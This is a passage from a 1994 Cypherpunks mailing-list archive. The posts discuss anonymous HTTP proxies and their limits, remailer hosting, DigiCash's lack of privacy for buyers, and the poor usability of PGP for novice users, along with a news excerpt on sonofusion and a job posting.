Message-ID: <199412202135.NAA21822@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

I posted some experiments on this a few weeks ago. Some existing web proxies, at least the one at CERN, will accept connections from anyone. Set your proxy server to one of those and you have a bit of anonymity already.

There is a problem with trying to get much more anonymity than this - most connections are for a very short period. So there is not as much possibility for batching and mixing as with remailers. Only those connections which are actually active at the same moment could have their in/out mapping confused from the perspective of someone watching the redirector site. So generally our goals have to be somewhat more limited than with remailers.

The way proxies work, as I understand it, is that normally when you connect to, say, http://site.org/dir/file.html, it connects to the special port number for http at site.org, then sends it the remainder of the URL, dir/file.html. When you use a proxy, it always connects to the proxy machine, then sends the whole URL (possibly not including the http:, I forget), e.g. site.org/dir/file.html. This way the proxy knows where you want to connect and does that for you.

The nice thing about this is that it is already built in to most clients. The bad thing is that it does not lend itself to chaining. Ideally, the purpose of chaining is so that no single link in the chain knows both ends. That way no one person can betray your trust. But with the current client software the very first proxy server sees both your address and your destination, so even if it went on to set up a chain you would have to trust it.

One idea that was suggested here would be to have a local proxy process, a very simple one which your fancy client connected to for all your net accesses. This would be where you would implement encryption, or new protocols for chaining, etc. This way we don't have to try to persuade client writers to incorporate our improvements; the existing proxy support provides the loophole we need. One nice feature, for example, would be a full 128 bit IDEA or RC4 encryption engine so that overseas Netscape users (or domestic ones who are stuck with crippled versions) can get good security.

However, running this kind of local proxy or a general chaining proxy does require root access. Most systems will not let you create a low-numbered socket unless you are root. So this is not something which people will be able to do from their user accounts.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6
-----END PGP SIGNATURE-----

From jya at pipeline.com Tue Dec 20 14:08:55 1994
From: jya at pipeline.com (John Young)
Date: Tue, 20 Dec 94 14:08:55 PST
Subject: NYT on Sonofusion
Message-ID: <199412202207.RAA05576@pipe2.pipeline.com>

Malcolm Browne writes today on sonoluminescence to produce cold fusion. Nix crypto, no excuso.

For email copy send blank message with subject: SON_fuz

Some tidbits:

New Shot at Cold Fusion By Pumping Sound Waves Into Tiny Bubbles

[Drawing caption] New Fusion Recipe: Sound Plus Bubbles

Fusion creates great energy but requires tremendous temperatures. In a new approach that scientists hope might reach such temperatures, they are using minuscule bubbles as the focus for sound waves. In this figure, a tiny heating element boils just enough water to create a single micron-sized bubble. A sound field makes the bubble pulsate. As it expands, it absorbs sound energy. Then it violently collapses, launching a spherical, inward-moving supersonic shock wave, which produces enormous temperatures and a flash of light.

By Malcolm W. Browne

Ever since the first hydrogen bomb was detonated in 1952, scientists have sought to harness thermonuclear fusion as a peaceful power source, but that goal has proved tantalizingly elusive. Now, however, there seems to be an outside chance that a wholly new technique could achieve it. Bombarding microscopic bubbles with intense sound waves could convert the bubbles into minuscule fusion furnaces.

Recent experiments by a half-dozen laboratories suggest that a mysterious phenomenon called sonoluminescence may be capable of raising the temperature of gas trapped in a tiny bubble to 1.8 million degrees Fahrenheit or more -- enough, in principle, to ignite fusion.

If fusion were achieved, a microbubble could be expected to radiate neutrons, nuclear particles produced by thermonuclear reactions. So far, the laboratories experimenting with sonoluminescence have failed to detect any neutrons, but there are other signs that the project is far from hopeless.

***

Lawrence Livermore Laboratory in California, the nation's preeminent hydrogen bomb laboratory, has conducted some small experiments on "sonofusion," the name that would be bestowed on any fusion technique powered by sonoluminescent bubbles.

As part of its nuclear weapons research programs during the 1980's, Livermore built the Nova laser, which focuses multiple beams of ultrapowerful lasers from all directions on a small target. Among the targets Livermore has tested are tiny, hollow glass spheres filled with hydrogen isotopes. In a typical experiment, the laser beams are turned on, the glass instantly vaporizes and the resulting shock wave of glass vapor is driven inward to compress the hydrogen. The idea is to get the hydrogen hot enough to initiate fusion.

***

Still, the nation's thermonuclear bomb designers eventually solved similar problems for full-scale hydrogen bombs, and Livermore's scientists believe that inertial confinement fusion as a means of generating comparatively cheap electric power will eventually prove to be practical.

The tiny bubbles used in sonoluminescence experiments are similar in terms of their fusion physics to their big brothers, hydrogen bombs and on a smaller scale, to the glass spheres used in inertial confinement fusion.

-------------------
End tids

Note: The NYT advertises an email address for "comments from readers about published articles and suggested areas of coverage":

From Michael at lawprof.demon.co.uk Tue Dec 20 14:29:42 1994
From: Michael at lawprof.demon.co.uk (Michael Froomkin)
Date: Tue, 20 Dec 94 14:29:42 PST
Subject: Digital Telephones in Europe (at least)
Message-ID: <742@lawprof.demon.co.uk>

I happened to be talking to a friend who works for a Very Large International Corporation. He has just been put in charge of managing their new products division. First on the list is whether and how to become a value added reseller of digital telephones and/or digital telephone services in Europe and eventually worldwide. They would probably include some financial/transactional services as part of the package.

He is pro-encryption, but not well informed. What should he insist the telephones have in the way of features? What should he read? He is not an engineer (he used to be a salesman...) but he's smart.

I will summarize emailed replies to the list. Please note that this ID expires on Dec. 27.

--
Michael Froomkin          until Dec. 27: michael at lawprof.demon.co.uk
U.Miami School of Law     Didsbury, Manchester, England
PO Box 248087
Coral Gables, FL 33124-8087              It is NOT warm here

From entropy at IntNet.net Tue Dec 20 14:39:17 1994
From: entropy at IntNet.net (Jonathan Cooper)
Date: Tue, 20 Dec 94 14:39:17 PST
Subject: c'punks top 5
In-Reply-To: <199412202030.PAA11794@bwh.harvard.edu>
Message-ID:

> It might also be nice to encrypt the connection from client to
> proxy. Otherwise, this service only protects you from the server
> knowing who you are. If you add encryption, then it begins to offer
> anonymity against people watching the proxy. (Assuming there are
> multiple connections to the proxy.)

In that case, you could make a local daemon software "wedge" that you'd connect to that would open an encrypted connection to the proxy. Should be rather easy.

Like I said before, implementation doesn't seem incredibly hard, but I've not seen a deluge of people offering up their boxes for this use.

-jon
( --------[ Jonathan D. Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 )

From entropy at IntNet.net Tue Dec 20 14:44:57 1994
From: entropy at IntNet.net (Jonathan Cooper)
Date: Tue, 20 Dec 94 14:44:57 PST
Subject: c'punks top 5
In-Reply-To: <9412202044.AA03402@ch1d157nwk>
Message-ID:

> I would think that running an anonymous HTTP proxy server is much less likely
> to bring people screaming to your sysadmin than an anonymous remailer. Thus
> there is a chance that there could be more people willing to put up the
> service than even remailers... However, while there may be less chance of
> forceful shutdown due to complaints, an anon-http proxy server would probably
> consume much more in the way of network resources than a remailer, which will
> likely lead to many being shutdown once discovered by the sysadmins
> (although, maybe not).

On this site, I know that running one would get it killed, me a stern warning, and if I did it again, my account removed.

My goal here is *NOT* to piss admins off - and what good are anon-HTTPD's if they're being killed every 10 minutes.

What is needed is someone who will offer up their box, that they own or directly control, for this purpose.

-jon
( --------[ Jonathan D.
Cooper ]--------[ entropy at intnet.net ]-------- )
( PGP 2.6.2 keyprint: 31 50 8F 82 B9 79 ED C4 5B 12 A0 35 E0 9B C0 01 )
( home page: http://hyperreal.com/~entropy/ ]-------[ Key-ID: 4082CCB5 )

From andrew_loewenstern at il.us.swissbank.com Tue Dec 20 15:03:51 1994
From: andrew_loewenstern at il.us.swissbank.com (Andrew Lowenstern)
Date: Tue, 20 Dec 94 15:03:51 PST
Subject: HTTP redirectors
Message-ID: <9412202303.AA04253@ch1d157nwk>

> However, running this kind of local proxy or a general chaining
> proxy does require root access. Most systems will not let you
> create a low-numbered socket unless you are root. So this is not
> something which people will be able to do from their user
> accounts.

Normally a URL can specify an alternate port as well (of course). A common one is http://site.org:8080/dir/file.html... This gets around setting up the proxy without a privileged account.

The only web browser I'm familiar with (OmniWeb for NeXTSTEP) also allows you to specify the port number for the proxy. I was under the impression that all browsers supported alternate port numbers for proxies since they are commonly used for URLs... Do Mosaic and Netscape allow specifying the port for proxy servers?

andrew

From merriman at metronet.com Tue Dec 20 15:19:47 1994
From: merriman at metronet.com (David K. Merriman)
Date: Tue, 20 Dec 94 15:19:47 PST
Subject: Win NT crypto?
Message-ID: <199412202319.AA10519@metronet.com>

Does anyone know if any of the 'standard' CP tools (remailers, etc) would run on a Windows NT machine (server edition 3.5)? A couple friends and I are under serious contemplation of setting up an ISP in a town of 100K+, and if it's possible, I'd like to put an anon remailer on it.

Thanks...

Dave Merriman
- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy From jamesd at netcom.com Tue Dec 20 15:44:41 1994 From: jamesd at netcom.com (James A. Donald) Date: Tue, 20 Dec 94 15:44:41 PST Subject: PGP-MIME spec (No Flames Allowed!) In-Reply-To: Message-ID: On Tue, 20 Dec 1994, Nathaniel Borenstein wrote: > I think we now have someone who has > stepped forward to write the new MIME-PGP draft, in consultation with > Phil Zimmerman and myself. A wise precaution. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at netcom.com From chen at intuit.com Tue Dec 20 16:13:33 1994 From: chen at intuit.com (Mark Chen) Date: Tue, 20 Dec 94 16:13:33 PST Subject: cypherpunks mentioned in Z Magazine In-Reply-To: Message-ID: <9412210011.AA02675@doom.intuit.com> > There was an article in Z Magazine about the RC4 disclosure, and IP and > information in general on the internet, in which the cypherpunks were > mentioned. They got a lot of information confused about cypherpunks, but > over all it was an interesting article. Here's the first portion of the > article, in which cypherpunks were given prominence. > If anyone wants to write them and clear up their confusion between > anonymous remailers and mailing lists, or other errors about the 'punks > (which generally cast us in a worse light then we should be), their address > is: > Z Magazine > 18 Millfield St > Woods Hole, MA 02543 As I've explained to Eric privately, I was the victim of a little editorial activism. The sentence about "the Cypherpunks' 'anonymous remailer,' list," is not mine. My original text included a longer description of remailers, which the editors decided to elide for the sake of brevity. This was done without my consent. 

As to "other errors," please clarify. I certainly had no intention of casting Cypherpunks in a bad light.

--
Mark Chen
chen at netcom.com
415/329-6913
finger for PGP public key
D4 99 54 2A 98 B1 48 0C CF 95 A5 B0 6E E0 1E 1D

From lmccarth at ducie.cs.umass.edu Tue Dec 20 16:42:21 1994
From: lmccarth at ducie.cs.umass.edu (L. McCarthy)
Date: Tue, 20 Dec 94 16:42:21 PST
Subject: anon-HTTP server w/o root access
Message-ID: <199412210047.TAA10557@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

someone writes:
$ an anon-http proxy server would probably consume much more in
$ the way of network resources than a remailer, which will
$ likely lead to many being shutdown once discovered by the sysadmins

That might be somewhat less true on a commercial provider than on an educational or corporate provider, but in any case a WWW anon-server would be seen as a much larger potential security hole than a remailer. A couple of months ago a "friendly" outsider gained unauthorized access to user files here via our Web server, and reported it to the sysadmins. I would have been mighty nervous if I'd been offering anon WWW access to the world.

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From lmccarth at ducie.cs.umass.edu Tue Dec 20 16:54:22 1994
From: lmccarth at ducie.cs.umass.edu (L.
McCarthy)
Date: Tue, 20 Dec 94 16:54:22 PST
Subject: Anon remailer on new ISP ?
Message-ID: <199412210059.TAA10637@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

Dave Merriman writes:
> Does anyone know if any of the 'standard' CP tools (remailers, etc) would
> run on a Windows NT machine (server edition 3.5)? A couple friends and I are
> under serious contemplation of setting up an ISP in a town of 100K+, and if
> it's possible, I'd like to put an anon remailer on it.

Great ! Two quick reactions:
[] Would it be possible to run an anon-http server on it ?
[] If you start a remailer-friendly site, I'd be very surprised if no-one here wanted to get an account there and establish a Windows NT remailer, written from scratch if necessary....

-L. Futplex McCarthy; PGP key by finger or server
"The objective is for us to get those conversations whether they're by an alligator clip or ones and zeroes. Wherever they are, whatever they are, I need them." -FBI Dir. Freeh

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.1
- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service
-----END PGP SIGNATURE-----

From Tony.Gurnick at nzdairy.co.nz Tue Dec 20 16:57:57 1994
From: Tony.Gurnick at nzdairy.co.nz (DNA)
Date: Tue, 20 Dec 94 16:57:57 PST
Subject: C code contest
Message-ID: <94122016253555@nzdairy.co.nz>

Elton at sybase.com wrote:
>I gather that this was one of the entries in the "obfuscated 'C'"
>programming contests that used to be held some years ago.
>(Are they still held?)

Yep, Mail chongo at TOAD.COM, coincidentally

T

From merriman at metronet.com Tue Dec 20 17:24:02 1994
From: merriman at metronet.com (David K. Merriman)
Date: Tue, 20 Dec 94 17:24:02 PST
Subject: Anon remailer on new ISP ?
Message-ID: <199412210123.AA00621@metronet.com>

-----BEGIN PGP SIGNED MESSAGE-----

Recycled PGP sig header above :-)

>Great ! Two quick reactions:
> [] Would it be possible to run an anon-http server on it ?
> [] If you start a remailer-friendly site, I'd be very surprised if
> no-one here wanted to get an account there and establish a Windows
> NT remailer, written from scratch if necessary....
>

I expect it will be a remailer-friendly site - the other two guys are even less computer-literate than I am, so I get to be the IS Manager :-/

If the NT-based tools were available, I'd be agreeable (even enthusiastic) about setting up "independent" remailers on it (ie, Tim's Remailer-in-a-box [my box, but what the heck :-]). We're looking at calling the site genisys.net, so additional remailers could be remailer at vogon.com, remailer at flatulnt.com, or whatever. Hell, if all folks wanted was a remailer, I might even be convinced to offer remailer-only accounts at a discount :-)

I'm still looking into what kind of magic I need to invoke to get it to all happen in the right order (IP address, then register the domain, do them in parallel, or ???.
Any rules/restrictions on what we can call our site (we'll be incorporated, but can we call the site ???.net/org/???], etc.).

ObQuestion: whyfor isn't toad set up so that the default reply-to address is the CP list, vice the originator?

Recycled signature follows for the benefit of the toad (easier to recycle them than do them from scratch on a plain-Windows box)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----
- - - - - - - - - - - - - - - - - - - - - - - - - -
Finger merriman at fohnix.metronet.com for PGP public key and fingerprint.
PGP encrypted Email welcome, encouraged, and preferred.
"Those who make peaceful revolution impossible will make violent revolution inevitable." John F. Kennedy

From ddt at lsd.com Tue Dec 20 18:01:52 1994
From: ddt at lsd.com (Dave Del Torto)
Date: Tue, 20 Dec 94 18:01:52 PST
Subject: GUI: PGP vs novices
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----

'Punks,

It's time for dave's quarterly "why are we here" post:

Well, the good news is that people in "the mainstream" are beginning to notice PGP and discuss the need for its existence. The bad news is that PGP is not really ready for them. As a system administrator for many novice users (hundreds at a time in the past), I can say with humble authority that PGP, no matter how trivially simple it may seem to us, is well beyond the ken of most users (I won't attempt to put a %age on them, let's just say it's well into the 90's). And it's not like no-one's noticing either:

- From a pure cost:benefit ratio, PGP is not yet a useful tool for most users.
I hate to frame it in such "'mersh" terms when the flow on this list is largely fascinating crypto-math or splendidly colorful insults, but let's admit our dirty little secret: PGP won't be widespread, people won't really appreciate all the good crypto work being done here and repressive government agencies and paranoid lawmakers will continue to whittle away at electronic privacy rights until the day that PGP becomes a widely-used, viable commercial utility. All you ViaCrypt people just sit tight: I'll get to you below. :)

I was particularly dis-Mayed by the initial reception that the Netscape folks received here. The Netscape/BofA posting I made recently obviously touched a nerve and well it should. I can certainly understand why Timothy would get CPO (completely pissed off) and want to take a vacation after some of the flotsam I saw drifting by here. As others have noted, some of your remarks were ill-considered and lacked tact. That doesn't make you bad people: I open mouth and insert foot now and then myself, but it's a good thing to consider next time an earnest startup working on a devilishly fasttrack schedule and trying to incorporate crypto comes online here.

Let me take this opportunity to offer an olive branch to the Netscape people. Your first shot with SSL is "okay," and I'll do what little I can to help you find/implement/test something better (even if you never return my phone calls, Tom Paquin!).

Now then, if you'll bear with me:

- -------------------------------------------------
> From: stephen.mccluskey. at hammar.pp.se (Stephen Mccluskey )
> Newsgroups: alt.security.pgp
> Subject: Re: I NUKED PGP. Why? This is why:
[elided]
> Message-ID: <9412160602073878 at hammar.pp.se>
[elided]
> John Dulaney has received a bit of flak for his statement
> that PGP is too complicated for the average user. Although I'm not an
> average user, I'd have to agree.
> The average user in our department can
> handle a word processor, do a bit with electronic mail, format a disk and
> a few other rudimentary things in DOS, and that's about it.
> If PGP is going to take off, it needs to consider their needs by
> seamlessly and transparently connecting with both mailers and word
> processors, so encrypting and sending a file would be no more complicated
> than printing, faxing, or e-mailing the same file.
[elided]

Actually, what it needs to break down to is a system software extension (to use the Mac as an example) that adds a smart "Encrypt/Decrypt" button (with a "sign" option) to every appropriate document-editing window, since printing, faxing and/or email are ALSO pretty challenging-to-impossible to a vast number of novice users. I'm not trying to insult the novices out there at all (if anything I sympathize with their plight and spend huge chunks of my time explaining the rudiments to them over and over again), I'm just speaking from experience as a sysadmin, tech support manager and educator.

- -------------------------------------------------
> From: trimble at beckman.uiuc.edu (Chris Trimble)
> Newsgroups: alt.security.pgp
> Subject: Re: I NUKED PGP. Why? This is why:
[elided]
> Message-ID: <3cmuhl$5vu at vixen.cso.uiuc.edu>
[elided]
> Not everyone in the world who might need/
> want to use PGP is a computer-savvy guy. This is something that I discussed
> with the MacPGP developers some two years ago. I offered to rewrite it from
> scratch, and was told not to because "there is a much better interface in
> development and will be available soon". I still have yet to see any of
> that.

Me either. BTW, does anyone know what ever happened to Crunch's OOP version for the Mac circa 1993?

> MacPGP is an example of a program that violates Apple's HIG up the wahzoo.
This is a dramatic understatement, and considering that the MacOS and Windows versions are the most likely candidates for spreading the use of crypto among mainstream users and thus further widening the opening of the barn door referred to in the post about Newt Gingrich, it's a case of near-criminal neglect on the part of the low-level and interface-level Cypherpunks.

I have no problems (well almost none) with the MacPGP versions I've used, but friends/colleagues/students I've exposed it to are generally left dumbfounded. This significantly adds to the difficulty of explaining WHAT cryptography is, explaining WHY they need it and then trying to show them a simple tool for empowering themselves with it.

I'd estimate that _maybe_ 10 of the roughly 250+ people I've spent quality time explaining PGP to are still using it. This is the lowest success-rate (measured in persistence of use) of any single piece of software I teach people how to use. This bodes not well for the future of electronic privacy and personal cryptography, especially when you factor in the minute percentage of those people who'll actually cast an informed vote on anything crypto-related in the next election. Not well at all. Time is on the side of the NSA, unfortunately.

ViaCrypt has kindly offered to send me a beta of their upcoming Mac version with enhanced AppleEvents support. This promises to open up some scripting capabilities not present in other earlier versions. I'm hopeful that, even if it doesn't differ significantly from MacPGP 2.6ui v1.2, the ViaCrypt app and the tech support that ViaCrypt provides will go a long way toward getting some of my users/clients/students using it, and I'm happy to pass the business along to them in light of their efforts.

The Cypherpunks should really launch a new list oriented toward novices with basic questions. It could be a Web page with a question form, or even an email address for the Web-challenged (I may do it, but I welcome any offers to help).
As an incentive to Cypherpunks, their friends and colleagues and members of the general public, I'm hereby offering to spend some time answering questions for novice users at either: or . Feel free to spread the word on this FREE (but limited by my time) service I'm offering. When the volume becomes too heavy, I'll ask you all to participate as well by asking you to identify what platform you use and what areas you're particularly savvy in ("Bo Knows Remailers."). Think of it as cypherpunk pro bono work: heck if _lawyers_ can do it, then altruistic 'punks can too, right?

Those two addresses are NOW up-and-running, BTW. Both map to the same tech supt account, so circulate the one you think sounds most appropriate.

> [MacPGP] completely locks your machine without any kind of dialog box when
> you are decrypting or encrypting, the menus aren't particularly related to
> the items under them, etc etc.

Indeed, MacPGP is the single most un-Maclike app I run regularly, without exception. I've been using it for three years, and while there has been progress, it's been extremely limited, mostly in fixing the most egregious GUI violations and keeping up-to-date with improvements in PGP source code.

So IMHO the Cypherpunks, as one of the foremost proponents of this technology, are basically shooting themselves in both left feet by not immediately and actively setting aside their wonderful projects to come up with more uncrackable crypto-algorithms (I'm not saying to STOP!) and focus for a few solid months collaborating on two extremely workable, fabulously easy implementations of the most basic functions of PGP for Windows and Mac boxes that any novice user can "plug in" and run alongside the software they use daily (word processors, email apps, even spreadsheets).
In addition to the system extension idea above, drag-n-drop apps for Mac desktops that people can plop a WP file on to encrypt/decrypt/sign it and the analog for Windows users should be a SUPER-HIGH PRIORITY starting yesterday. Is it beyond the scope of possibilities to actually get the most code-wise capable people here to stop flaming each other and name-calling and work together for a while? How much bigger a barrel must we be staring down before there's some significant togetherness resulting in visible software?

> If the "cypherpunks" really want to see a world of free encryption, then
> they should start putting more effort into making that encryption more
> comprehensible to the ordinary user. Right now, PGP is a program that isn't,
> and is essentially only usable to those who are computer-savvy.

Let me cite a small example: a few minutes ago, I let a close personal friend sit down at my workstation to telnet to her email account, and she proceeded, while my back was turned for *just a moment*, to close *every dang window* in *all 14 processes* I had running (including some text and a script I'd been editing - grrr) so that she could (get this...) "clean up the screen." I explained in the most non-emotional, non-accusatory terms what she'd just done (without mentioning the hours of work she'd cost me by not saving certain things). Her response mechanism was to tear up and begin to (almost) cry. No, it has nothing to do with the Moon, and yes, this is normally a very competent person (errr, computing matters excluded, need I mention?).

Anyway, it was my own dang fault, wasn't it? Of course it was: how could _she_ know that there's an easy mechanism for _hiding_ all the windows in the bg processes? That's far too hidden a feature. Sure, there's a "Hide Others" menu item under an iconic menu (cute but cryptic), but what does "Others" refer to? Everyone else in the room who might look over your shoulder? Think about it.
For that matter, what the HECK is a "console" window, or a "verbose" menu command? And this is on a friggin' MACINTOSH! We're not even talking Windows here, lads, much less X Windows... or even >gasp< DOS! ;)

Anyway, this is just an object lesson on how exCRUciatingly simple crypto is going to have to become. Too bad we can't get it all running by the end of the day, because in half an hour I have to attempt to teach that same friend to use PGP...

...wish me luck.

dave
_____________________________________________________________
"Civil Liberty Through Easy Cryptography." (ibi, nuntium!)

-----BEGIN PGP SIGNATURE-----
Version: 2.6ui

iQCVAgUBLveIhqHBOF9KrwDlAQG4YwQAwqbqD6Qx291kAzSmtJRaReUrIV7/X1WC
Hp2j2ABshWe35TFwdc1n8KhShUYljnMCEWvNvTYOzTCFpdLLAf5lOc0tSH1RVYGH
kWtoeBEn3ciqBHXBddeQazS0SRm9lAcd4oX3Zwt4wXokE2hnaF3KGamJI2sVZ+Io
b3RIBVNJOGI=
=9Qwl
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Tue Dec 20 18:15:58 1994
From: hfinney at shell.portal.com (Hal)
Date: Tue, 20 Dec 94 18:15:58 PST
Subject: HTTP redirectors
In-Reply-To: <9412202303.AA04253@ch1d157nwk>
Message-ID: <199412210215.SAA17204@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

Andrew Lowenstern writes:

>Normally a URL can specify an alternate port as well (of course). A common
>one is http://site.org:8080/dir/file.html... This gets around setting up
>the proxy without a privileged account. The only web browser I'm familiar
>with (OmniWeb for NeXTSTEP) also allows you to specify the port number for
>the proxy. I was under the impression that all browsers supported alternate
>port numbers for proxies since they are commonly used for URLs... Do Mosaic
>and Netscape allow specifying the port for proxy servers?

Yes, I think you are right. I think you can set your proxy to site.org:8080 or whatever and clients will use the specified port number. This is at least true of lynx, and I think they all use pretty much the same conventions on this.
So I was mistaken in saying that you would need root privileges to set up your own proxy. And I don't see that it would be much of a security hole in that it would be no more privileged than the user who ran it. Most security concerns come because httpd is running as a privileged process, I think.

An http redirector shouldn't be much more trouble than a remailer, although the user who is running it would want some assurance that his own files wouldn't be threatened.

Hal

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBLvePsxnMLJtOy9MBAQFehwH/VQ3vCTDL/uGFJidXYnKca4NV+1kK/bQU
5WUFxNl3Qhk2t/zKPUxBnOunkpLXArhQW0TCIb5wDk54Wskh1q2iBA==
=Yufk
-----END PGP SIGNATURE-----

From hfinney at shell.portal.com Tue Dec 20 18:24:18 1994
From: hfinney at shell.portal.com (Hal)
Date: Tue, 20 Dec 94 18:24:18 PST
Subject: No privacy with DigiCash
Message-ID: <199412210221.SAA18077@jobe.shell.portal.com>

One of the reasons we want http redirectors is so we could buy things anonymously. There is not much point in anonymous digital cash when your web connections advertise who you are.

But, the current ecash implementation from DigiCash doesn't allow this to work! When you buy something, the vendor has to know your machine name because he wants to connect back to your ecash wallet process. So even if you did connect via a redirector, your anonymity would be destroyed (or at least badly hurt) when you tell it your machine name so it can connect to you.

This is a really bad way of doing it IMO because it seems to defeat one of the big selling points of DigiCash. Is there something I am overlooking, some way to buy things privately with DigiCash?
Hal

From sommerfeld at orchard.medford.ma.us Tue Dec 20 19:29:01 1994
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Tue, 20 Dec 94 19:29:01 PST
Subject: No privacy with DigiCash
In-Reply-To: <199412210221.SAA18077@jobe.shell.portal.com>
Message-ID: <199412210316.WAA00684@orchard.medford.ma.us>

-----BEGIN PGP SIGNED MESSAGE-----

> When you buy something, the vendor has to know your machine
> name because he wants to connect back to your ecash wallet process.
> So even if you did connect via a redirector, your anonymity would be
> destroyed (or at least badly hurt) when you tell it your machine
> name so it can connect to you.
>
> Is there something I am overlooking, some way to buy things
> privately with DigiCash?

Yes... at least one TCP/IP proxy system (socks) lets the client receive incoming connections (the client makes a second connection to the socks server, and the socks server informs it of the addr/port that it's listening on; when a connection comes in to that port, the two incoming connections are gatewayed to each other); that's how socksified FTP works, by the way.

Things could get sticky if the server needs to make multiple connections to the wallet at the same address (in sequence or in series), but I'd imagine that this wouldn't be the case..

- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1

iQCVAwUBLveeD7T+rHlVUGpxAQFPmAP/SH8FVIKZJqt1OCTHamxmvILo2kEoz/GP
aObHB7X76QWOQXecicGcz/RCKQ7usoHzEI9+P8NkR1yCiZUVAmuK9lFR2YVcDW/Z
KkAglcoppBEQjf2bFhTH7D6W9uSLAYii5M0I0tNTUU61riruhn3akeJ0ur0E7Smw
xN+lKzXuRUo=
=Aiqk
-----END PGP SIGNATURE-----

From jcorgan at netcom.com Tue Dec 20 19:38:58 1994
From: jcorgan at netcom.com (Johnathan Corgan)
Date: Tue, 20 Dec 94 19:38:58 PST
Subject: FW: Opportunity: Software Engineer with TIA Development Team
Message-ID:

Just an FYI for anyone out there:

On Tue, 20 Dec 1994 14:47:34 -0700 Andrew Currie wrote:

>Cyberspace Development, Inc.
>(CSD) has an immediate opening
>for an experienced C/C++, UNIX, TCP/IP software developer to
>join our TIA product development team. Responsibilities will
>include design & development of new features, customization,
>optimization, porting to new platforms, and maintenance.
>This developer will also be involved in future CSD products
>and online services beyond TIA.
>
>TIA, or The Internet Adapter (tm), is a commercial software product
>sold over the Internet that emulates a SLIP (and soon PPP) connection
>on a standard Internet shell account. (For complete info on TIA
>and more info on CSD please visit our site at http://marketplace.com/
>or send email to tia-info at marketplace.com.)
>
>Technical Skill Requirements
>----------------------------
>* Excellent C and C++ programming skills
>* Experience with TCP/IP programming
>* Experience with serial communications programming
>* Detailed knowledge of PPP
>* Development experience with several UNIX environments
>* Deep knowledge, wide experience, and interest in Internet technology
>
>Other Requirements
>------------------
>* Strong commitment to customer satisfaction
>* Flexible & adaptable; with a proven ability to learn quickly
>* Willing to take responsibility & "ownership" of a problem till solved
>* Self-starter with strong work ethics (dependable)
>* Team Player - enjoy working in concert w/sales, marketing & tech support
>* Provide your own office with phone, machine, & Net connection
>
>Definite Plus:
>---------------
>* Already aware of, understand, (and use) TIA daily
>* Located in or near Boulder, CO or Seattle, WA
>* Previous experience with commercial product development
>* Experience in the online services industry or another start-up
>* SQL and relational or object-oriented DBMS experience
>* PERL, csh, CGI, or HTML scripting experience
>* Add'l experience with one or more: Mac, Windows, DOS, VMS development
>
>Compensation
>------------
>* Negotiable depending on education, work experience, and
>"fit".
>* Developer will start as a contractor so we both have a "dating period".
>* We are open to profit-sharing as part of the compensation package
>
>Schedule
>--------
>* Start immediately (or by 1/31/95 at the latest)
>
>If this opportunity sounds like a match with your skills & interests
>then please send the following info in ASCII format:
>
>o Detailed response to each bullet item above (with examples please)
>o Current resume
>o 3 recent references relevant to both technical skills & work style
>o The compensation you suggest
>o Earliest date you could start
>o Any questions/issues you have
>
>as soon as possible to: Opportunity at MarketPlace.com
>
>Thank you for your time and attention. Please forward this post to
>other relevant mailing lists, newsgroups, or folks who may be interested.
>
>========================================================================
>Cyberspace Development, Inc. Makers of TIA - The Internet Adapter (tm)
>========================================================================
>
>
>

=======================================================================
Johnathan Corgan "Violence is the last refuge of the incompetent"
jcorgan at netcom.com -Isaac Asimov
PGP Public Key: http://www-swiss.ai.mit.edu/~bal/pks-toplev.html
Or send email to: pgp-public-keys at pgp.ai.mit.edu Subj: GET jcorgan
=======================================================================

From dave at esi.COM.AU Tue Dec 20 21:05:56 1994
From: dave at esi.COM.AU (Dave Horsfall)
Date: Tue, 20 Dec 94 21:05:56 PST
Subject: GUI: PGP vs novices
In-Reply-To:
Message-ID:

On Tue, 20 Dec 1994, Dave Del Torto relayed to us:

> I'd estimate that _maybe_ 10 of the roughly 250+ people I've spent quality
> time explaining PGP to are still using it.

Egad.
I suppose I shouldn't feel too annoyed that out of over fifty copies of PGP (from the 2.3A days) I've distributed (at my own expense) to radio amateurs in Australia (for authentication on packet radio), with two lectures and an article in a national magazine, and exhortations to call me about any problems, precisely two other people are using it (but are not signing their messages); and these were already crypto-aware to start with - sigh...

I'm not going to give up - at least my signature is generating enquiries.

--
Dave Horsfall (VK2KFU) | dave at esi.com.au | VK2KFU @ VK2AAB.NSW.AUS.OC | PGP 2.6
Opinions expressed are mine. | E7 FE 97 88 E5 02 3C AE 9C 8C 54 5B 9A D4 A0 CD

From hfinney at shell.portal.com Tue Dec 20 21:10:59 1994
From: hfinney at shell.portal.com (Hal)
